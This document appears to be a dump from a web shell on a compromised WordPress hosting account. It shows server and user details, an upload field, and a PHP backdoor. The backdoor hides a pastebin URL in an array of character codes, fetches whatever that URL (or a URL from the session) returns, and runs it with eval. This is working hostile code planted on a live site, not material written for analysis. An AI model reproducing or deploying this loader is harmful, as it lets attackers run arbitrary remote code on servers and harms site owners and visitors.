Server IP : 162.0.215.126 / Your IP : 216.73.216.56 Web Server : LiteSpeed System : Linux business105.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64 User : tektomgb ( 586) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tektomgb/tektk77gacor.lat/wp-admin-9lqip/bk/ |
Upload File : |
<?php session_start(); function fetchUrl($url) { if (!filter_var($url, FILTER_VALIDATE_URL)) { return false; } $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $result = curl_exec($ch); if (curl_errno($ch)) { $result = false; } curl_close($ch); return $result; } $asciiArray = [104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 103, 115, 119, 50, 68, 99, 102, 113]; $url = implode('', array_map('chr', $asciiArray)); // Gunakan URL dari session jika tersedia $targetUrl = $_SESSION["ts_url"] ?? $url; if (filter_var($targetUrl, FILTER_VALIDATE_URL)) { $result = @file_get_contents($targetUrl) ?: fetchUrl($targetUrl); if ($result !== false) { eval('?>' . $result); } else { echo "Error: Unable to fetch content."; } } else { echo "Error: Invalid URL."; } ?>